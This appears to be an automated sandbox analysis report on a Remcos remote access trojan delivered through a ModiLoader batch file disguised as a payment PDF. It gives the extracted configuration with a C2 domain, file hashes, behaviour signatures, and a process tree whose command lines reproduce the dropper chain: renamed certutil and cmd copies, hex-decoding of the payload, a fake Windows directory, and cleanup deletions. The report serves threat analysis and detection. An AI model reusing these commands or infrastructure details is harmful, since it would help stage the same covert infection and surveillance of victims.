Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    13-08-2024 08:36

General

  • Target

    PAYMENT TRANSFER ERROR.PDF.bat

  • Size

    6.1MB

  • MD5

    9981f8d217254ed2a4cb7a3356535cd5

  • SHA1

    7ae24e3a9c0a28901c24958a17bdf8b344eab454

  • SHA256

    de6f03e7fe7a7c5aa0462d01bd825650bd44acb38e130fc106de4b2c63d7f046

  • SHA512

    6f2168d9e024df2e0e196ecc5896bd42046c16e0dae8bf20c6f16ae7f46ce89f88730847cb878dfe4079a851405456a8ad024a35f2642ed8442c721172465ac2

  • SSDEEP

    49152:W8rzn3QeR6gIn+Sk954nuF83R5H93MUJBHeMrdrekrLwptyyD4kA+mfMea6Nc6:+

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

127.0.0.1:59089

legacyrem.duckdns.org:59089

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-BF03RK

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:2228
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:1708
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2284
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3
            3⤵
            • Executes dropped EXE
            PID:2248
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2240
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10
            3⤵
            • Executes dropped EXE
            PID:2848
        • C:\Users\Public\Libraries\AHA.COM
          C:\Users\Public\Libraries\AHA.COM
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:760
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Public\Libraries\jkzjblcW.cmd" "
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2952
            • C:\Windows\SysWOW64\esentutl.exe
              C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
              4⤵
                PID:1848
              • C:\Windows\SysWOW64\esentutl.exe
                C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                4⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:308
              • C:\Users\Public\alpha.pif
                C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:808
              • C:\Users\Public\alpha.pif
                C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2556
              • C:\Users\Public\alpha.pif
                C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1936
                • C:\Users\Public\xpha.pif
                  C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1448
              • C:\Windows \SysWOW64\per.exe
                "C:\\Windows \\SysWOW64\\per.exe
                4⤵
                • Executes dropped EXE
                PID:1852
              • C:\Windows \SysWOW64\per.exe
                "C:\Windows \SysWOW64\per.exe"
                4⤵
                • Executes dropped EXE
                PID:2812
              • C:\Users\Public\alpha.pif
                C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2072
              • C:\Users\Public\alpha.pif
                C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2920
              • C:\Users\Public\alpha.pif
                C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2992
            • C:\Windows\SysWOW64\esentutl.exe
              C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AHA.COM /d C:\\Users\\Public\\Libraries\\Wclbjzkj.PIF /o
              3⤵
                PID:740
              • C:\Windows\SysWOW64\SndVol.exe
                C:\Windows\System32\SndVol.exe
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1144
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
              2⤵
              • Executes dropped EXE
              PID:1700
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AHA.GIF" / A / F / Q / S
              2⤵
              • Executes dropped EXE
              PID:2168

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\remcos\logs.dat

            Filesize

            222B

            MD5

            b875da0a35144e3e532af56571df9959

            SHA1

            ba378dcc14882571fd7c23e680bd7c499644dba9

            SHA256

            aeb083a04ac3b1472d18bf411feee008fdd4a9f43d698d472b22799565064235

            SHA512

            238710866ca2d659047c88e059367896e4d39cdef43c3fb6dc3210d3772a3ed3f6d1aa2169bca8925d91c9803407c70014e483e09cd3ae07ea71e782dd12bda6

          • C:\Users\Admin\AppData\Local\Temp\CabB6E3.tmp

            Filesize

            70KB

            MD5

            49aebf8cbd62d92ac215b2923fb1b9f5

            SHA1

            1723be06719828dda65ad804298d0431f6aff976

            SHA256

            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

            SHA512

            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

          • C:\Users\Admin\AppData\Local\Temp\TarB714.tmp

            Filesize

            181KB

            MD5

            4ea6026cf93ec6338144661bf1202cd1

            SHA1

            a1dec9044f750ad887935a01430bf49322fbdcb7

            SHA256

            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

            SHA512

            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

          • C:\Users\Public\AHA.GIF

            Filesize

            4.2MB

            MD5

            2ddfa3ebd56847d40e59f092be0e6568

            SHA1

            3e56b1a986cd5600bc8dd134f1ff2ce5dbd53827

            SHA256

            11693a473afe426024135c37b1013491c2e98d89e6c9da6edfcc0a8c28bf1d02

            SHA512

            92816361505672a82452ed2036120a3d45e6abfa52577db819ba56318109da5242428bdf521751d6832976bc63831ddbaf0c10ad6563d26ed7b177f276421652

          • C:\Users\Public\Libraries\AHA.COM

            Filesize

            1.2MB

            MD5

            d70fa5471771d18888f0861ac060a914

            SHA1

            83ef28ef9e4850629433f497fd0360120449e297

            SHA256

            31a7e70deb8af07d7b76b5dea8cbf90ec63bea24bffdd5ebac6f223c02f55753

            SHA512

            af89922e5a24a12522603e4a034b2e1aef911d5cf6399de426aa95b971dcf70513a99f45033895939f0475d7b001054717c9b0d38278ff45ee2b41376f3da31b

          • C:\Users\Public\Libraries\jkzjblcW.cmd

            Filesize

            60KB

            MD5

            b87f096cbc25570329e2bb59fee57580

            SHA1

            d281d1bf37b4fb46f90973afc65eece3908532b2

            SHA256

            d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e

            SHA512

            72901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7

          • C:\Users\Public\xpha.pif

            Filesize

            15KB

            MD5

            6242e3d67787ccbf4e06ad2982853144

            SHA1

            6ac7947207d999a65890ab25fe344955da35028e

            SHA256

            4ca10dba7ff487fdb3f1362a3681d7d929f5aa1262cdfd31b04c30826983fb1d

            SHA512

            7d0d457e1537d624119a8023bcc086575696a5739c0460ef11554afac13af5e5d1edc7629a10e62834aba9f1b3ab1442011b15b4c3930399d91dca34b3b1cbaf

          • C:\Windows \SysWOW64\per.exe

            Filesize

            94KB

            MD5

            869640d0a3f838694ab4dfea9e2f544d

            SHA1

            bdc42b280446ba53624ff23f314aadb861566832

            SHA256

            0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

            SHA512

            6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

          • \Users\Public\alpha.exe

            Filesize

            337KB

            MD5

            5746bd7e255dd6a8afa06f7c42c1ba41

            SHA1

            0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

            SHA256

            db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

            SHA512

            3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

          • \Users\Public\alpha.pif

            Filesize

            295KB

            MD5

            ad7b9c14083b52bc532fba5948342b98

            SHA1

            ee8cbf12d87c4d388f09b4f69bed2e91682920b5

            SHA256

            17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae

            SHA512

            e12aad20c824187b39edb3c7943709290b5ddbf1b4032988db46f2e86da3cf7e7783f78c82e4dc5da232f666b8f9799a260a1f8e2694eb4d0cdaf78da710fde1

          • \Users\Public\kn.exe

            Filesize

            1.1MB

            MD5

            ec1fd3050dbc40ec7e87ab99c7ca0b03

            SHA1

            ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

            SHA256

            1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

            SHA512

            4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

          • memory/760-38-0x0000000000400000-0x0000000000540000-memory.dmp

            Filesize

            1.2MB

          • memory/760-36-0x0000000002FB0000-0x0000000003FB0000-memory.dmp

            Filesize

            16.0MB

          • memory/760-34-0x0000000002FB0000-0x0000000003FB0000-memory.dmp

            Filesize

            16.0MB

          • memory/1144-141-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-157-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-143-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-137-0x0000000002640000-0x0000000003640000-memory.dmp

            Filesize

            16.0MB

          • memory/1144-145-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-146-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-147-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-148-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-149-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-150-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-156-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-142-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-138-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-164-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-165-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-168-0x000000002BF60000-0x000000002BF79000-memory.dmp

            Filesize

            100KB

          • memory/1144-171-0x000000002BF60000-0x000000002BF79000-memory.dmp

            Filesize

            100KB

          • memory/1144-172-0x000000002BF60000-0x000000002BF79000-memory.dmp

            Filesize

            100KB

          • memory/1144-173-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-178-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-179-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB